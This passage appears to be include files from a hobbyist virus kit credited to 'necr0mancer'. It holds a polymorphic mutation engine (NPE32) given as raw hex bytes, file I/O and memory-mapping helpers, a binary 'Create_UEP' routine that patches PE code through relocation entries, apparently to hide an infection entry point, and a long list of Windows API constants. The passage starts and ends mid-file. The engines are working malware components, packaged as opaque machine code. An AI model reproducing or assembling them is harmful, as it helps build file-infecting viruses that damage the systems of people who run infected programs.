074h,005h,070h,03Ah,0F2h,074h,0F4h,088h,075h,057h,056h,04Eh,04Eh,08Bh,0C6h db 0FFh,0D1h,040h,066h,089h,085h,0FEh,002h,000h,000h,091h,058h,08Dh,075h,070h db 
08Dh,07Dh,064h,0E8h,00Eh,003h,000h,000h,05Fh,057h,033h,0C0h,0E8h,0E1h,000h db 000h,000h,050h,0DBh,01Ch,024h,058h,06Ah,005h,058h,0E8h,03Eh,003h,000h,000h db 040h,091h,08Bh,044h,024h,004h,005h,000h,00Ch,000h,000h,089h,045h,05Ch,051h db 057h,00Fh,0B7h,085h,0FEh,002h,000h,000h,08Bh,0C8h,048h,08Dh,075h,064h,08Dh db 07Eh,006h,08Bh,0DFh,0E8h,0D1h,002h,000h,000h,05Fh,087h,0F3h,0ACh,08Ah,0F0h db 056h,033h,0C0h,0B0h,0FFh,0BBh,000h,000h,000h,000h,08Dh,075h,003h,0E8h,013h db 002h,000h,000h,08Dh,075h,05Ch,087h,026h,08Ah,0E6h,050h,08Bh,045h,060h,050h db 087h,026h,05Eh,0E2h,0DAh,059h,0E2h,0BBh,033h,0C0h,0E8h,047h,001h,000h,000h db 05Eh,060h,0FFh,0D6h,061h,05Fh,057h,08Bh,0DFh,081h,0C3h,000h,00Ch,000h,000h db 056h,053h,0B0h,001h,0E8h,062h,000h,000h,000h,0E8h,0A7h,001h,000h,000h,08Dh db 075h,05Ch,087h,026h,058h,089h,045h,060h,058h,08Bh,0DCh,087h,026h,08Bh,00Ch db 024h,03Bh,0D9h,077h,00Eh,08Ah,0F4h,0B4h,000h,08Dh,075h,003h,0E8h,0BAh,001h db 000h,000h,0EBh,0D8h,0B0h,001h,0E8h,000h,001h,000h,000h,08Bh,0DFh,05Eh,00Fh db 0B7h,085h,0FEh,002h,000h,000h,0B9h,000h,000h,000h,000h,066h,0F7h,0E1h,091h db 0F3h,0A5h,058h,02Bh,0F8h,089h,07Ch,024h,01Ch,0BFh,000h,000h,000h,000h,08Bh db 045h,058h,050h,0DBh,01Ch,024h,059h,02Bh,0D9h,003h,0C3h,0ABh,0F8h,061h,0C2h db 014h,000h,08Bh,0F7h,0FEh,0C8h,075h,008h,08Dh,08Dh,0ADh,003h,000h,000h,0EBh db 006h,08Dh,08Dh,0E0h,003h,000h,000h,033h,0C0h,048h,0E8h,04Eh,002h,000h,000h db 089h,045h,058h,0FFh,0D1h,057h,0DBh,004h,024h,058h,0B0h,0E8h,0AAh,033h,0C0h db 0ABh,0FFh,0D1h,052h,08Bh,085h,0BBh,003h,000h,000h,0E8h,030h,002h,000h,000h db 08Ah,074h,005h,070h,080h,0FEh,000h,074h,0ECh,0B0h,058h,00Ah,0C6h,0AAh,0FFh db 0D1h,066h,0B8h,081h,0E8h,00Ah,0E6h,066h,0ABh,08Bh,045h,058h,083h,0C0h,005h db 0ABh,0FFh,0D1h,051h,066h,0B8h,08Dh,080h,00Ah,0E6h,08Ah,075h,057h,08Ah,0D6h db 0C0h,0E6h,003h,00Ah,0E6h,066h,0ABh,08Bh,045h,058h,02Bh,0DEh,003h,0C3h,089h db 0BDh,04Dh,002h,000h,000h,0ABh,059h,0FFh,0D1h,066h,0B8h,087h,0E0h,00Ah,0E2h db 
066h,0ABh,05Ah,0FFh,0D1h,0B0h,0B8h,00Ah,0C2h,0AAh,052h,051h,0B8h,000h,000h db 000h,000h,099h,033h,0C9h,066h,0B9h,000h,000h,0C1h,0E1h,002h,066h,0F7h,0F1h db 040h,089h,085h,03Bh,002h,000h,000h,0ABh,059h,0FFh,0D1h,08Bh,0C7h,040h,089h db 085h,07Bh,003h,000h,000h,087h,0CAh,00Fh,0B6h,08Dh,0FEh,002h,000h,000h,08Dh db 075h,064h,0ACh,00Ch,058h,0AAh,0FFh,0D2h,0E2h,0F8h,05Ah,0C3h,053h,050h,0FEh db 0C8h,075h,008h,08Dh,09Dh,0ADh,003h,000h,000h,0EBh,006h,08Dh,09Dh,0E0h,003h db 000h,000h,0FFh,0D3h,00Fh,0B6h,08Dh,0FEh,002h,000h,000h,051h,08Dh,075h,064h db 003h,0F1h,04Eh,0FDh,0ACh,0FCh,00Ch,050h,0AAh,0FFh,0D3h,0E2h,0F6h,066h,0B8h db 081h,0C4h,066h,0ABh,058h,0C1h,0E0h,002h,0ABh,0FFh,0D3h,066h,0B8h,048h,074h db 00Ah,0C2h,066h,0ABh,057h,0AAh,0FFh,0D3h,0B0h,0E9h,0AAh,0BEh,000h,000h,000h db 000h,08Bh,0C7h,083h,0C0h,005h,02Bh,0C6h,0F7h,0D8h,0ABh,0FFh,0D3h,087h,0FEh db 05Fh,08Bh,0C6h,02Bh,0C7h,048h,0AAh,087h,0FEh,0FFh,0D3h,066h,0B8h,087h,0E0h db 00Ah,065h,057h,066h,0ABh,0FFh,0D3h,058h,0FEh,0C8h,074h,003h,0B0h,0C3h,0AAh db 05Bh,0C3h,060h,0B8h,006h,000h,000h,000h,0E8h,015h,001h,000h,000h,040h,091h db 0B8h,000h,000h,000h,000h,0E8h,009h,001h,000h,000h,08Ah,074h,005h,070h,0B8h db 0FFh,000h,000h,000h,08Dh,075h,027h,0BBh,000h,000h,000h,000h,0E8h,007h,000h db 000h,000h,0E2h,0DEh,089h,03Ch,024h,061h,0C3h,060h,03Ch,0FFh,074h,016h,0C6h db 045h,056h,001h,08Dh,004h,086h,00Fh,0B6h,058h,003h,08Dh,004h,09Eh,08Ah,050h db 002h,066h,08Bh,000h,0EBh,017h,0C6h,045h,056h,000h,093h,0E8h,0C7h,000h,000h db 000h,089h,044h,024h,01Ch,08Dh,004h,086h,08Ah,050h,002h,066h,08Bh,000h,08Ah db 0EAh,080h,0FEh,000h,075h,006h,00Fh,0BAh,0E2h,002h,073h,062h,080h,0E2h,003h db 00Ah,0D2h,074h,013h,0FEh,0CAh,074h,007h,08Ah,0D6h,0C0h,0E2h,003h,00Ah,0E2h db 00Ah,0E4h,075h,002h,00Ah,0C6h,00Ah,0E6h,08Ah,0D5h,080h,0E2h,0C0h,0C0h,0EAh db 006h,0FEh,0CAh,075h,003h,0AAh,0EBh,002h,066h,0ABh,08Ah,0D5h,080h,0E2h,038h db 0C0h,0EAh,003h,0FEh,04Dh,056h,074h,00Dh,033h,0C0h,048h,0E8h,06Dh,000h,000h db 
000h,089h,045h,060h,0EBh,003h,08Bh,045h,060h,080h,0FAh,004h,074h,00Bh,080h db 0FAh,002h,074h,009h,0FEh,0CAh,074h,009h,0EBh,00Ah,0ABh,0EBh,007h,066h,0ABh db 0EBh,003h,033h,0C0h,0AAh,089h,03Ch,024h,061h,0C3h,060h,049h,074h,02Bh,050h db 058h,050h,0E8h,03Ah,000h,000h,000h,08Ah,004h,006h,03Ah,0C2h,074h,0F2h,03Ah db 045h,057h,074h,0EDh,0AAh,086h,0E0h,05Bh,0ACh,03Ah,0C2h,074h,0FBh,03Ah,045h db 057h,074h,0F6h,03Ah,0C4h,074h,0F2h,0AAh,0E2h,0EFh,061h,0C3h,093h,08Bh,0C3h db 0E8h,00Fh,000h,000h,000h,08Ah,004h,006h,03Ah,0C2h,074h,0F2h,03Ah,045h,057h db 074h,0EDh,0AAh,061h,0C3h,060h,050h,0B8h,078h,056h,034h,012h,0BFh,005h,084h db 008h,008h,0F7h,0E7h,040h,089h,085h,0D0h,004h,000h,000h,033h,0D2h,059h,00Bh db 0C9h,074h,006h,0F7h,0F1h,089h,054h,024h,01Ch,061h,0C3h,04Eh,050h,045h,033h db 032h,05Bh,031h,033h,031h,038h,05Dh,06Eh,065h,063h,072h,030h,06Dh,061h,06Eh db 063h,065h,072h,057h,00Fh,001h,04Ch,024h,0FEh,05Fh,089h,047h,008h,089h,047h db 018h,00Fh,023h,0C0h,00Fh,023h,0C8h,00Fh,023h,0D0h,00Fh,023h,0D8h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[NPE32BIN.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RING3IO.INC]ÄÄÄ ;Include file ring-3 InputOutput functions ;(c) necr0mancer ; ; necr0mancer2001@hotmail.com ;------------------------------- ;Input:edx=offset of filename fopen proc pushad xor ebx,ebx push ebx push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push ebx push FILE_SHARE_READ + FILE_SHARE_WRITE push GENERIC_READ + GENERIC_WRITE push edx call [ebp+CreateFile @ex] inc eax ;eax=-1? 
jz fopen_exit dec eax fopen_exit: mov [esp._eax], eax popad retn fopen endp ;------------------------------- ;Input:ebx=handle fclose proc pushad push ebx call [ebp+CloseHandle @ex] popad retn fclose endp ;------------------------------- ;Input:ebx=handle file ; ecx=count of bytes to read ; edx=offset of bufer fread proc pushad push 0 lea eax,[ebp+offset bytesread @ex] push eax push ecx push edx push ebx call [ebp+ReadFile @ex] popad retn fread endp ;------------------------------- ;Input:ebx=handle file ; ecx=count of bytes to move fseek proc pushad push FILE_BEGIN push 0 push ecx push ebx call [ebp+SetFilePointer @ex] popad retn fseek endp ;------------------------------- ;Input:ebx=handle file ; ecx=count of bytes to write ; edi=offset of bufer fwrite proc pushad push 0 lea eax,[ebp+offset bytesread @ex] push eax push ecx push edi push ebx call [ebp+WriteFile @ex] popad retn fwrite endp f_createmap proc pusha xor eax,eax push eax ;for mapvievoffile push eax ;name push eax ;lowsize push eax ;highsize push PAGE_READWRITE push eax push ebx call [ebp+CreateFileMappingA @ex] xchg ebx,eax pop eax ;null push eax ;count bytes push eax ;lowsize push eax ;highsize push FILE_MAP_WRITE push ebx call [ebp+MapViewOfFile @ex] mov [esp+_eax],eax popa retn f_createmap endp f_closemap proc pusha push ebx call [ebp+UnmapViewOfFile @ex] popa retn f_closemap endp ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RING3IO.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RIPBIN.INC]ÄÄÄ ;It "engine" I have written for fun;) ;----------------------------------------------------------------------------- ;Create_UEP( ; dword VO // virtual offset ; *dword code // offset to .code section(already has read) ; *dword reloc // offset to .reloc section(already has read) ; dword num_records // count of records in table to rewrite ; *dword adr_modify // address of "replasing" proc ; *dword mask_table // pointer to a mask table ; ); 
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Create_UEP: db 060h,08Bh,074h,024h,02Ch,08Bh,07Ch,024h,028h,081h,0EFh,000h,010h,000h,000h db 003h,03Eh,08Bh,046h,004h,0BAh,008h,000h,000h,000h,052h,02Bh,0C2h,099h,0B9h db 002h,000h,000h,000h,066h,0F7h,0F1h,05Ah,091h,00Fh,0B7h,004h,016h,066h,025h db 0FFh,00Fh,003h,0C7h,056h,051h,093h,08Bh,074h,024h,040h,033h,0C0h,0ACh,00Fh db 0B6h,0C8h,066h,0ADh,00Bh,0C0h,074h,012h,049h,074h,008h,066h,039h,043h,0FEh db 074h,026h,0EBh,005h,038h,043h,0FEh,074h,01Fh,0EBh,0E4h,059h,05Eh,083h,0C2h db 002h,0E2h,0CAh,08Bh,046h,004h,003h,0F0h,099h,033h,0D2h,0BBh,000h,010h,000h db 000h,0F7h,0F3h,00Bh,0D2h,074h,095h,0F9h,0EBh,02Dh,093h,059h,05Eh,051h,057h db 0F8h,08Dh,05Ch,024h,038h,0FFh,00Bh,08Bh,00Bh,0E3h,01Bh,048h,048h,08Bh,0D8h db 02Bh,0C7h,003h,006h,087h,0DFh,093h,056h,08Bh,074h,024h,030h,08Bh,044h,024h db 040h,0FFh,0D0h,05Eh,05Fh,059h,0EBh,0BAh,05Fh,059h,061h,0C2h,018h,000h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RIPBIN.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN.INC]ÄÄÄ ;Windows95/NT assembly language include file by SMT/SMF. All rights reserved. ;Modifed by Necr0mancer.No rights reserved. 
NULL equ 0 TRUE equ 1 FALSE equ 0 MAX_PATH equ 260 PIPE_WAIT equ 00000000h PIPE_NOWAIT equ 00000001h PIPE_READMODE_BYTE equ 00000000h PIPE_READMODE_MESSAGE equ 00000002h PIPE_TYPE_BYTE equ 00000000h PIPE_TYPE_MESSAGE equ 00000004h SC_SIZE equ 0F000h SC_MOVE equ 0F010h SC_MINIMIZE equ 0F020h SC_MAXIMIZE equ 0F030h SC_NEXTWINDOW equ 0F040h SC_PREVWINDOW equ 0F050h SC_CLOSE equ 0F060h SC_VSCROLL equ 0F070h SC_HSCROLL equ 0F080h SC_MOUSEMENU equ 0F090h SC_KEYMENU equ 0F100h SC_ARRANGE equ 0F110h SC_RESTORE equ 0F120h SC_TASKLIST equ 0F130h SC_SCREENSAVE equ 0F140h SC_HOTKEY equ 0F150h SC_DEFAULT equ 0F160h SC_MONITORPOWER equ 0F170h SC_CONTEXTHELP equ 0F180h SC_SEPARATOR equ 0F00Fh WM_NULL equ 0000h WM_CREATE equ 0001h WM_DESTROY equ 0002h WM_MOVE equ 0003h WM_SIZE equ 0005h WM_ACTIVATE equ 0006h WA_INACTIVE equ 0 WA_ACTIVE equ 1 WA_CLICKACTIVE equ 2 WM_SETFOCUS equ 0007h WM_KILLFOCUS equ 0008h WM_ENABLE equ 000Ah WM_SETREDRAW equ 000Bh WM_SETTEXT equ 000Ch WM_GETTEXT equ 000Dh WM_GETTEXTLENGTH equ 000Eh WM_PAINT equ 000Fh WM_CLOSE equ 0010h WM_QUERYENDSESSION equ 0011h WM_QUIT equ 0012h WM_QUERYOPEN equ 0013h WM_ERASEBKGND equ 0014h WM_SYSCOLORCHANGE equ 0015h WM_ENDSESSION equ 0016h WM_SHOWWINDOW equ 0018h WM_WININICHANGE equ 001Ah WM_DEVMODECHANGE equ 001Bh WM_ACTIVATEAPP equ 001Ch WM_FONTCHANGE equ 001Dh WM_TIMECHANGE equ 001Eh WM_CANCELMODE equ 001Fh WM_SETCURSOR equ 0020h WM_MOUSEACTIVATE equ 0021h WM_CHILDACTIVATE equ 0022h WM_QUEUESYNC equ 0023h WM_GETMINMAXINFO equ 0024h WM_PAINTICON equ 0026h WM_ICONERASEBKGND equ 0027h WM_NEXTDLGCTL equ 0028h WM_SPOOLERSTATUS equ 002Ah WM_DRAWITEM equ 002Bh WM_MEASUREITEM equ 002Ch WM_DELETEITEM equ 002Dh WM_VKEYTOITEM equ 002Eh WM_CHARTOITEM equ 002Fh WM_SETFONT equ 0030h WM_GETFONT equ 0031h WM_SETHOTKEY equ 0032h WM_GETHOTKEY equ 0033h WM_QUERYDRAGICON equ 0037h WM_COMPAREITEM equ 0039h WM_COMPACTING equ 0041h WM_COMMNOTIFY equ 0044h ; /* no longer suported */ WM_WINDOWPOSCHANGING equ 0046h WM_WINDOWPOSCHANGED equ 0047h 
WM_POWER equ 0048h WM_COPYDATA equ 004Ah WM_CANCELJOURNAL equ 004Bh WM_NOTIFY equ 004Eh WM_INPUTLANGCHANGERequEST equ 0050h WM_INPUTLANGCHANGE equ 0051h WM_TCARD equ 0052h WM_HELP equ 0053h WM_USERCHANGED equ 0054h WM_NOTIFYFORMAT equ 0055h NFR_ANSI equ 1h NFR_UNICODE equ 2h NF_QUERY equ 3h NF_RequERY equ 4h WM_CONTEXTMENU equ 007Bh WM_STYLECHANGING equ 007Ch WM_STYLECHANGED equ 007Dh WM_DISPLAYCHANGE equ 007Eh WM_GETICON equ 007Fh WM_SETICON equ 0080h WM_NCCREATE equ 0081h WM_NCDESTROY equ 0082h WM_NCCALCSIZE equ 0083h WM_NCHITTEST equ 0084h WM_NCPAINT equ 0085h WM_NCACTIVATE equ 0086h WM_GETDLGCODE equ 0087h WM_NCMOUSEMOVE equ 00A0h WM_NCLBUTTONDOWN equ 00A1h WM_NCLBUTTONUP equ 00A2h WM_NCLBUTTONDBLCLK equ 00A3h WM_NCRBUTTONDOWN equ 00A4h WM_NCRBUTTONUP equ 00A5h WM_NCRBUTTONDBLCLK equ 00A6h WM_NCMBUTTONDOWN equ 00A7h WM_NCMBUTTONUP equ 00A8h WM_NCMBUTTONDBLCLK equ 00A9h WM_KEYFIRST equ 0100h WM_KEYDOWN equ 0100h WM_KEYUP equ 0101h WM_CHAR equ 0102h WM_DEADCHAR equ 0103h WM_SYSKEYDOWN equ 0104h WM_SYSKEYUP equ 0105h WM_SYSCHAR equ 0106h WM_SYSDEADCHAR equ 0107h WM_KEYLAST equ 0108h WM_IME_STARTCOMPOSITION equ 010Dh WM_IME_ENDCOMPOSITION equ 010Eh WM_IME_COMPOSITION equ 010Fh WM_IME_KEYLAST equ 010Fh WM_INITDIALOG equ 0110h WM_COMMAND equ 0111h WM_SYSCOMMAND equ 0112h WM_TIMER equ 0113h WM_HSCROLL equ 0114h WM_VSCROLL equ 0115h WM_INITMENU equ 0116h WM_INITMENUPOPUP equ 0117h WM_MENUSELECT equ 011Fh WM_MENUCHAR equ 0120h WM_ENTERIDLE equ 0121h WM_CTLCOLORMSGBOX equ 0132h WM_CTLCOLOREDIT equ 0133h WM_CTLCOLORLISTBOX equ 0134h WM_CTLCOLORBTN equ 0135h WM_CTLCOLORDLG equ 0136h WM_CTLCOLORSCROLLBAR equ 0137h WM_CTLCOLORSTATIC equ 0138h WM_MOUSEFIRST equ 0200h WM_MOUSEMOVE equ 0200h WM_LBUTTONDOWN equ 0201h WM_LBUTTONUP equ 0202h WM_LBUTTONDBLCLK equ 0203h WM_RBUTTONDOWN equ 0204h WM_RBUTTONUP equ 0205h WM_RBUTTONDBLCLK equ 0206h WM_MBUTTONDOWN equ 0207h WM_MBUTTONUP equ 0208h WM_MBUTTONDBLCLK equ 0209h WM_MOUSEWHEEL equ 020Ah WM_PARENTNOTIFY equ 0210h MENULOOP_WINDOW 
equ 0h MENULOOP_POPUP equ 1h WM_ENTERMENULOOP equ 0211h WM_EXITMENULOOP equ 0212h WM_SIZING equ 0214h WM_CAPTURECHANGED equ 0215h WM_MOVING equ 0216h WM_POWERBROADCAST equ 0218h WM_DEVICECHANGE equ 0219h WM_IME_SETCONTEXT equ 0281h WM_IME_NOTIFY equ 0282h WM_IME_CONTROL equ 0283h WM_IME_COMPOSITIONFULL equ 0284h WM_IME_SELECT equ 0285h WM_IME_CHAR equ 0286h WM_IME_KEYDOWN equ 0290h WM_IME_KEYUP equ 0291h WM_MDICREATE equ 0220h WM_MDIDESTROY equ 0221h WM_MDIACTIVATE equ 0222h WM_MDIRESTORE equ 0223h WM_MDINEXT equ 0224h WM_MDIMAXIMIZE equ 0225h WM_MDITILE equ 0226h WM_MDICASCADE equ 0227h WM_MDIICONARRANGE equ 0228h WM_MDIGETACTIVE equ 0229h WM_MDISETMENU equ 0230h WM_ENTERSIZEMOVE equ 0231h WM_EXITSIZEMOVE equ 0232h WM_DROPFILES equ 0233h WM_MDIREFRESHMENU equ 0234h WM_MOUSEHOVER equ 02A1h WM_MOUSELEAVE equ 02A3h WM_CUT equ 0300h WM_COPY equ 0301h WM_PASTE equ 0302h WM_CLEAR equ 0303h WM_UNDO equ 0304h WM_RENDERFORMAT equ 0305h WM_RENDERALLFORMATS equ 0306h WM_DESTROYCLIPBOARD equ 0307h WM_DRAWCLIPBOARD equ 0308h WM_PAINTCLIPBOARD equ 0309h WM_VSCROLLCLIPBOARD equ 030Ah WM_SIZECLIPBOARD equ 030Bh WM_ASKCBFORMATNAME equ 030Ch WM_CHANGECBCHAIN equ 030Dh WM_HSCROLLCLIPBOARD equ 030Eh WM_QUERYNEWPALETTE equ 030Fh WM_PALETTEISCHANGING equ 0310h WM_PALETTECHANGED equ 0311h WM_HOTKEY equ 0312h WM_PRINT equ 0317h WM_PRINTCLIENT equ 0318h WM_HANDHELDFIRST equ 0358h WM_HANDHELDLAST equ 035Fh WM_AFXFIRST equ 0360h WM_AFXLAST equ 037Fh WM_PENWINFIRST equ 0380h WM_PENWINLAST equ 038Fh MB_OK equ 000000000h MB_OKCANCEL equ 000000001h MB_ABORTRETRYIGNORE equ 000000002h MB_YESNOCANCEL equ 000000003h MB_YESNO equ 000000004h MB_RETRYCANCEL equ 000000005h MB_TYPEMASK equ 00000000fh MB_ICONHAND equ 000000010h MB_ICONQUESTION equ 000000020h MB_ICONEXCLAMATION equ 000000030h MB_ICONASTERISK equ 000000040h MB_ICONMASK equ 0000000f0h MB_ICONINFORMATION equ 000000040h MB_ICONSTOP equ 000000010h MB_DEFBUTTON1 equ 000000000h MB_DEFBUTTON2 equ 000000100h MB_DEFBUTTON3 equ 000000200h MB_DEFMASK 
equ 000000f00h MB_APPLMODAL equ 000000000h MB_SYSTEMMODAL equ 000001000h MB_TASKMODAL equ 000002000h MB_NOFOCUS equ 000008000h IDNO equ 7 IDYES equ 6 IDCANCEL equ 2 SB_HORZ equ 0 SB_VERT equ 1 SB_CTL equ 2 SB_BOTH equ 3 SB_THUMBPOSITION equ 4 SB_ENDSCROLL equ 8 SW_HIDE equ 00h SW_SHOWNORMAL equ 01h SW_SHOWMINIMIZED equ 02h SW_SHOWMAXIMIZED equ 03h SW_SHOW equ 05h SW_RESTORE equ 09h SW_SHOWDEFAULT equ 0Ah WM_USER equ 0400h WS_POPUP equ 080000000h WS_CHILD equ 040000000h WS_MINIMIZE equ 020000000h WS_VISIBLE equ 010000000h WS_MAXIMIZE equ 001000000h WS_CAPTION equ 000C00000h WS_BORDER equ 000800000h WS_DLGFRAME equ 000400000h WS_VSCROLL equ 000200000h WS_HSCROLL equ 000100000h WS_SYSMENU equ 000080000h ;WS_SIZEBOX equ 000040000h WS_MINIMIZEBOX equ 000020000h WS_MAXIMIZEBOX equ 000010000h WS_OVERLAPPEDWINDOW equ 000CF0000h WS_EX_NOPARENTNOTIFY equ 000000004h WS_EX_WINDOWEDGE equ 000000100h WS_EX_CLIENTEDGE equ 000000200h WS_EX_OVERLAPPEDWINDOW equ WS_EX_WINDOWEDGE + WS_EX_CLIENTEDGE CS_VREDRAW equ 00001h CS_HREDRAW equ 00002h CS_PARENTDC equ 00080h CS_BYTEALIGNWINDOW equ 02000h BDR_RAISEDOUTER equ 01h BDR_SUNKENOUTER equ 02h BDR_RAISEDINNER equ 04h BDR_SUNKENINNER equ 08h EDGE_RAISED equ BDR_RAISEDOUTER + BDR_RAISEDINNER EDGE_SUNKEN equ BDR_SUNKENOUTER + BDR_SUNKENINNER EDGE_ETCHED equ BDR_SUNKENOUTER + BDR_RAISEDINNER EDGE_BUMP equ BDR_RAISEDOUTER + BDR_SUNKENINNER BF_LEFT equ 01h BF_TOP equ 02h BF_RIGHT equ 04h BF_BOTTOM equ 08h BF_RECT equ BF_LEFT + BF_TOP + BF_RIGHT + BF_BOTTOM IDOK equ 1 IDCANCEL equ 2 IDABORT equ 3 IDRETRY equ 4 IDIGNORE equ 5 IDYES equ 6 IDNO equ 7 IDCLOSE equ 8 IDHELP equ 9 COLOR_BTNFACE equ 15 DLGWINDOWEXTRA equ 30 IDC_ARROW equ 32512 WM_CTLCOLORDLG equ 136h WM_SETFOCUS equ 7 WM_KEYFIRST equ 0100h WM_KEYDOWN equ 0100h WM_KEYUP equ 0101h WM_CHAR equ 0102h WM_DEADCHAR equ 0103h WM_SYSKEYDOWN equ 0104h WM_SYSKEYUP equ 0105h WM_SYSCHAR equ 0106h WM_SYSDEADCHAR equ 0107h WM_KEYLAST equ 0108h WM_SETICON equ 80h DS_3DLOOK equ 0004H DS_FIXEDSYS equ 
0008H DS_NOFAILCREATE equ 0010H DS_CONTROL equ 0400H DS_CENTER equ 0800H DS_CENTERMOUSE equ 1000H DS_CONTEXTHELP equ 2000H DS_ABSALIGN equ 01h DS_SYSMODAL equ 02h DS_LOCALEDIT equ 20h DS_SETFONT equ 40h DS_MODALFRAME equ 80h DS_NOIDLEMSG equ 100h DS_SETFOREGROUND equ 200h FILE_FLAG_WRITE_THROUGH equ 80000000h FILE_FLAG_OVERLAPPED equ 40000000h FILE_FLAG_NO_BUFFERING equ 20000000h FILE_FLAG_RANDOM_ACCESS equ 10000000h FILE_FLAG_SequENTIAL_SCAN equ 08000000h FILE_FLAG_DELETE_ON_CLOSE equ 04000000h FILE_FLAG_BACKUP_SEMANTICS equ 02000000h FILE_FLAG_POSIX_SEMANTICS equ 01000000h CREATE_NEW equ 1 CREATE_ALWAYS equ 2 OPEN_EXISTING equ 3 OPEN_ALWAYS equ 4 TRUNCATE_EXISTING equ 5 GMEM_FIXED equ 0000h GMEM_MOVEABLE equ 0002h GMEM_NOCOMPACT equ 0010h GMEM_NODISCARD equ 0020h GMEM_ZEROINIT equ 0040h GMEM_MODIFY equ 0080h GMEM_DISCARDABLE equ 0100h GMEM_NOT_BANKED equ 1000h GMEM_SHARE equ 2000h GMEM_DDESHARE equ 2000h GMEM_NOTIFY equ 4000h GMEM_LOWER equ GMEM_NOT_BANKED GMEM_VALID_FLAGS equ 7F72h GMEM_INVALID_HANDLE equ 8000h LMEM_FIXED equ 0000h LMEM_MOVEABLE equ 0002h LMEM_NOCOMPACT equ 0010h LMEM_NODISCARD equ 0020h LMEM_ZEROINIT equ 0040h LMEM_MODIFY equ 0080h LMEM_DISCARDABLE equ 0F00h LMEM_VALID_FLAGS equ 0F72h LMEM_INVALID_HANDLE equ 8000h LHND equ (LMEM_MOVEABLE or LMEM_ZEROINIT) LPTR equ (LMEM_FIXED or LMEM_ZEROINIT) NONZEROLHND equ (LMEM_MOVEABLE) NONZEROLPTR equ (LMEM_FIXED) LMEM_DISCARDED equ 4000h LMEM_LOCKCOUNT equ 00FFh DRIVE_UNKNOWN equ 0 DRIVE_NO_ROOT_DIR equ 1 DRIVE_REMOVABLE equ 2 DRIVE_FIXED equ 3 DRIVE_REMOTE equ 4 DRIVE_CDROM equ 5 DRIVE_RAMDISK equ 6 FILE_TYPE_UNKNOWN equ 0000h FILE_TYPE_DISK equ 0001h FILE_TYPE_CHAR equ 0002h FILE_TYPE_PIPE equ 0003h FILE_TYPE_REMOTE equ 8000h ;================================ WINNT.H =============== FILE_READ_DATA equ ( 0001h ) FILE_LIST_DIRECTORY equ ( 0001h ) FILE_WRITE_DATA equ ( 0002h ) FILE_ADD_FILE equ ( 0002h ) FILE_APPEND_DATA equ ( 0004h ) FILE_ADD_SUBDIRECTORY equ ( 0004h ) FILE_CREATE_PIPE_INSTANCE equ ( 
0004h ) FILE_READ_EA equ ( 0008h ) FILE_WRITE_EA equ ( 0010h ) FILE_EXECUTE equ ( 0020h ) FILE_TRAVERSE equ ( 0020h ) FILE_DELETE_CHILD equ ( 0040h ) FILE_READ_ATTRIBUTES equ ( 0080h ) FILE_WRITE_ATTRIBUTES equ ( 0100h ) ;FILE_ALL_ACCESS equ (STANDARD_RIGHTS_RequIRED or SYNCHRONIZE or 1FFh) ;FILE_GENERIC_READ equ (STANDARD_RIGHTS_READ or FILE_READ_DATA or FILE_READ_ATTRIBUTES or FILE_READ_EA or SYNCHRONIZE) ;FILE_GENERIC_WRITE equ (STANDARD_RIGHTS_WRITE or FILE_WRITE_DATA or FILE_WRITE_ATTRIBUTES or FILE_WRITE_EA or FILE_APPEND_DATA or SYNCHRONIZE) ;FILE_GENERIC_EXECUTE equ (STANDARD_RIGHTS_EXECUTE or FILE_READ_ATTRIBUTES or FILE_EXECUTE or SYNCHRONIZE) FILE_SHARE_READ equ 00000001h FILE_SHARE_WRITE equ 00000002h FILE_SHARE_DELETE equ 00000004h FILE_ATTRIBUTE_READONLY equ 00000001h FILE_ATTRIBUTE_HIDDEN equ 00000002h FILE_ATTRIBUTE_SYSTEM equ 00000004h FILE_ATTRIBUTE_DIRECTORY equ 00000010h FILE_ATTRIBUTE_ARCHIVE equ 00000020h FILE_ATTRIBUTE_NORMAL equ 00000080h FILE_ATTRIBUTE_TEMPORARY equ 00000100h FILE_ATTRIBUTE_COMPRESSED equ 00000800h FILE_ATTRIBUTE_OFFLINE equ 00001000h FILE_NOTIFY_CHANGE_FILE_NAME equ 00000001h FILE_NOTIFY_CHANGE_DIR_NAME equ 00000002h FILE_NOTIFY_CHANGE_ATTRIBUTES equ 00000004h FILE_NOTIFY_CHANGE_SIZE equ 00000008h FILE_NOTIFY_CHANGE_LAST_WRITE equ 00000010h FILE_NOTIFY_CHANGE_LAST_ACCESS equ 00000020h FILE_NOTIFY_CHANGE_CREATION equ 00000040h FILE_NOTIFY_CHANGE_SECURITY equ 00000100h FILE_ACTION_ADDED equ 00000001h FILE_ACTION_REMOVED equ 00000002h FILE_ACTION_MODIFIED equ 00000003h FILE_ACTION_RENAMED_OLD_NAME equ 00000004h FILE_ACTION_RENAMED_NEW_NAME equ 00000005h FILE_CASE_SENSITIVE_SEARCH equ 00000001h FILE_CASE_PRESERVED_NAMES equ 00000002h FILE_UNICODE_ON_DISK equ 